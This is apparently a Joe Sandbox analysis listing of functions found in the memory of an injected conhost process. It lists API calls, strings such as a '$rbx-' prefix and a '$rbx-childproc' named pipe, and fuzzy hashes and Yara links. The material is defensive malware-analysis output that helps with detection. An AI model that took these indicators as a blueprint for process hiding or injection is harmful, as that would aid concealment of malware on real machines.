Instruction ID: 7894e31d9bf7f1e1d8f0daf2918ae5a7139f82b40a6c85b9485f4f9eaf871bf0
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 0051AC32701B0493FA659F76A8807E932B0BB48BB0F88C7259E3D473D6DF78D565A240

Function 000001B4449033A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PdhGetCounterInfoW.PDH ref: 000001B4449033FD
GetProcessHeap.KERNEL32 ref: 000001B444903412
HeapAlloc.KERNEL32 ref: 000001B444903420
PdhGetCounterInfoW.PDH ref: 000001B444903436
StrCmpW.SHLWAPI ref: 000001B44490344B

Part of subcall function 000001B444903950: StrCmpNW.SHLWAPI ref: 000001B444903972
Part of subcall function 000001B444903950: StrStrW.SHLWAPI ref: 000001B444903990
Part of subcall function 000001B444903950: StrToIntW.SHLWAPI ref: 000001B4449039B7

GetProcessHeap.KERNEL32 ref: 000001B444903488
HeapFree.KERNEL32 ref: 000001B444903496

Strings

\GPU Engine(*)\Running Time, xrefs: 000001B444903444

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 63f3587b54d2b15d1fd7c5ad99d3bcc5b50314de1d7ee5e6b6195a911edfd8a6
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: D231A232A00B4097F771DF72A8847D9B3B0F788BD6F858625DE4947A26DF38C4669740

Function 000001B4449034B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PdhGetCounterInfoW.PDH ref: 000001B444903516
GetProcessHeap.KERNEL32 ref: 000001B444903527
HeapAlloc.KERNEL32 ref: 000001B444903535
PdhGetCounterInfoW.PDH ref: 000001B44490354B
StrCmpW.SHLWAPI ref: 000001B444903560

Part of subcall function 000001B444903950: StrCmpNW.SHLWAPI ref: 000001B444903972
Part of subcall function 000001B444903950: StrStrW.SHLWAPI ref: 000001B444903990
Part of subcall function 000001B444903950: StrToIntW.SHLWAPI ref: 000001B4449039B7

GetProcessHeap.KERNEL32 ref: 000001B44490358D
HeapFree.KERNEL32 ref: 000001B44490359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000001B444903559

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 3ae4c25ad16d35e7700d5eaf680f80ff8f1b795346d6e8fd04e9380eb0645f7a
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: A2312B32610B458BFB60DF32A8C4B99B3B1B788F95F4581259E4A53766EF38C866D700

Function 000001B44490A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001B44490A289

Part of subcall function 000001B44490B144: __GetUnwindTryBlock.LIBCMT ref: 000001B44490B187
Part of subcall function 000001B44490B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001B44490B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001B44490A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001B44490A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001B44490A6BC

Strings

csm, xrefs: 000001B44490A2A3
csm, xrefs: 000001B44490A30A
csm, xrefs: 000001B44490A384

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 18c4848c3fe626c4d672897abd40f2bd0a56ece1c08ee5c1546d75db6a971ce5
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 5DD16972604B808BEB20DB7594843DD77F0F765B98F108219EE8957B9ADF34C4A1EB80

Function 000001B4448A962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001B4448A9689

Part of subcall function 000001B4448AA544: __GetUnwindTryBlock.LIBCMT ref: 000001B4448AA587
Part of subcall function 000001B4448AA544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001B4448AA5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001B4448A9761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001B4448A99AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001B4448A9ABC

Strings

csm, xrefs: 000001B4448A96A3
csm, xrefs: 000001B4448A9784
csm, xrefs: 000001B4448A970A

Memory Dump Source

Source File: 00000014.00000003.2318613329.000001B4448A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B4448A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_1b4448a0000_conhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: e60c2cfcce102fcaba678f3f03b004ea9b98cc401d15638874805763b243815f
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: 5DD17C3A608B848BEF60DFA5D4803ED77A0FB55788F148516EE8967B96DFB4D0A1C700

Function 000001B44490104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001B4449010B1
RegEnumValueW.ADVAPI32 ref: 000001B444901117
GetProcessHeap.KERNEL32 ref: 000001B44490115A
HeapAlloc.KERNEL32 ref: 000001B444901168
GetProcessHeap.KERNEL32 ref: 000001B444901185
HeapFree.KERNEL32 ref: 000001B444901193

Strings

d, xrefs: 000001B4449010D6

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 55a88ce8310408e5ca3866b56f05178f02c5b8574d209b657552d84bb9bd5f8c
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 54418C33214B80DBE7A4CF31E48579A77B1F388B99F448129DA8907B59DF39C499CB40

Function 000001B444902518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001B44490252D
GetCurrentProcessId.KERNEL32 ref: 000001B444902537
CreateFileW.KERNEL32 ref: 000001B444902568
WriteFile.KERNEL32 ref: 000001B444902590
ReadFile.KERNEL32 ref: 000001B4449025AF
CloseHandle.KERNEL32 ref: 000001B4449025B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 000001B444902549

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 81814320b12abb28dafed95e6a46d83729cadb3973f41b76cf2907b6901ae763
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: AF113736614B4083F750CF61F49839AB771F389BA5F948215EA9902AA9CF3CC168CB40

Function 000001B444907C50 Relevance: 12.2, APIs: 8, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001B444907C78
__scrt_acquire_startup_lock.LIBCMT ref: 000001B444907CCA
_RTC_Initialize.LIBCMT ref: 000001B444907CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001B444907D1E
__scrt_release_startup_lock.LIBCMT ref: 000001B444907D49

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 310d56a0d9e13f9b8a9553d24df171a60345dc87557337fef716ff6189678dc3
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 4E81B131700A418BFBA0EB7694C13E973B1AB85BA4F54C165AA4987797DF38C876B700

Function 000001B4448A7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001B4448A7078
__scrt_acquire_startup_lock.LIBCMT ref: 000001B4448A70CA
_RTC_Initialize.LIBCMT ref: 000001B4448A70F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001B4448A711E
__scrt_release_startup_lock.LIBCMT ref: 000001B4448A7149

Memory Dump Source

Source File: 00000014.00000003.2318613329.000001B4448A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B4448A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_1b4448a0000_conhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 18acefc8d352f54553c54cba37a9ccd64f6fd5da5e6683460892d8e5b781eb7e
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 3481C33D7006858BFE54AB6998423D973D1AF86B80F49C025AE09677D7DFB8C876E700

Function 000001B444909AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,?,?,000001B444909C6B,?,?,?,000001B44490945C,?,?,?,?,000001B444908F65), ref: 000001B444909B31
GetLastError.KERNEL32(?,?,?,000001B444909C6B,?,?,?,000001B44490945C,?,?,?,?,000001B444908F65), ref: 000001B444909B3F
LoadLibraryExW.KERNEL32(?,?,?,000001B444909C6B,?,?,?,000001B44490945C,?,?,?,?,000001B444908F65), ref: 000001B444909B69
FreeLibrary.KERNEL32(?,?,?,000001B444909C6B,?,?,?,000001B44490945C,?,?,?,?,000001B444908F65), ref: 000001B444909BD7
GetProcAddress.KERNEL32(?,?,?,000001B444909C6B,?,?,?,000001B44490945C,?,?,?,?,000001B444908F65), ref: 000001B444909BE3

Strings

api-ms-, xrefs: 000001B444909B51

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: edf3e1e77bacf71dc782d8ca6cee84bf0f0f84abea8bb80c8e8fcda97f07428a
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: CD31A1313126409BFE51DB26A8807E533F4BB44BB4F5A8629EE1D47796EF38C464E310

Function 000001B444913400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001B444913431
GetLastError.KERNEL32 ref: 000001B44491343D
CloseHandle.KERNEL32 ref: 000001B444913455
CreateFileW.KERNEL32 ref: 000001B444913480
WriteConsoleW.KERNEL32 ref: 000001B44491349F

Strings

CONOUT$, xrefs: 000001B444913461

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: f0fa99bd62df95ac14892b301c6a97daec3332a14353a867b2d6a779ec9b638d
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: A8116031310B4087F7A18BA2E894759B7B0F788BF5F448214EA5E87BD5CF38C4249740

Function 000001B444906270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001B4449062AB
GetThreadContext.KERNEL32 ref: 000001B444906415

Part of subcall function 000001B4449060A0: GetCurrentThreadId.KERNEL32 ref: 000001B4449060A4

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 50a3d2aba997ac5eaa9b6fb8a0ca58433b254b65fc81f496d7491e8623055f7f
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: EBD17C76204B8886DB70DB1AE49439AB7B0F7C8B98F104516EACD57BA6DF3CC561DB00

Function 000001B444902098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001B4449020A6
TlsFree.KERNEL32 ref: 000001B44490225F
TlsFree.KERNEL32 ref: 000001B44490226B
TlsFree.KERNEL32 ref: 000001B444902277
TlsFree.KERNEL32 ref: 000001B444902283
TlsFree.KERNEL32 ref: 000001B44490228F

Part of subcall function 000001B444905E50: GetCurrentThreadId.KERNEL32 ref: 000001B444905E66

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: b91d5e13956fead561301f578a7fb07dcf23f08c54c07252b4ecb19dd3195544
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: CD51E034201B4597EB49DF78E8D53D873B1BB04759F808825A96C46BA7EF78C938E340

Function 000001B4449035C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000001B4449024D1), ref: 000001B4449035EB
HeapAlloc.KERNEL32(?,?,?,?,?,000001B4449024D1), ref: 000001B4449035FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000001B4449024D1), ref: 000001B444903673
GetProcessHeap.KERNEL32(?,?,?,?,?,000001B4449024D1), ref: 000001B4449036D9
HeapFree.KERNEL32(?,?,?,?,?,000001B4449024D1), ref: 000001B4449036E7

Strings

$rbx-, xrefs: 000001B44490366C

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: c4fc703256a291c02bf995bd590257b161354b7bb8c8b7b471f4f6eae97ffe4f
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 16318832701B5583EA65DF36A9817A9B3B0FB44B84F09C0209F4907B66EF38C8B1A700

Function 000001B44490C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001B44490C94F
SetLastError.KERNEL32 ref: 000001B44490C96E
FlsSetValue.KERNEL32 ref: 000001B44490C997
FlsSetValue.KERNEL32 ref: 000001B44490C9A8
FlsSetValue.KERNEL32 ref: 000001B44490C9B9

Part of subcall function 000001B44490D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001B44490674A), ref: 000001B44490D2B6
Part of subcall function 000001B44490D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001B44490674A), ref: 000001B44490D2C0

SetLastError.KERNEL32 ref: 000001B44490C9DC

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 4bf8cf0c78c64848dad9c9c1bbb7b472b41946d4785c7daaa569019cb526d1dd
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 3E118E3231124043FA58BF35A8D57EE3272AB85BA4F58C624A96A567CBCF38C421B300

Function 000001B444901A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001B444901A56
K32GetModuleFileNameExW.KERNEL32 ref: 000001B444901A74
PathFindFileNameW.SHLWAPI ref: 000001B444901A83
lstrlenW.KERNEL32 ref: 000001B444901A8F
StrCpyW.SHLWAPI ref: 000001B444901AA2
CloseHandle.KERNEL32 ref: 000001B444901AB0

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: c5eb053444e7889b53c5f5ef0d7a88c881ce811834ecf096b4f50a6322cf994c
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: BD015B31700A4087FA50DF62A89839973B1F788FD1F8981349E4D43755DF38C996C740

Function 000001B444903E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001B444903AAC), ref: 000001B444903E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001B444903AAC), ref: 000001B444903E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001B444903AAC), ref: 000001B444903E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001B444903AAC), ref: 000001B444903E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001B444903AAC), ref: 000001B444903E9F
TerminateThread.KERNEL32(?,?,?,?,?,000001B444903AAC), ref: 000001B444903EAE

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
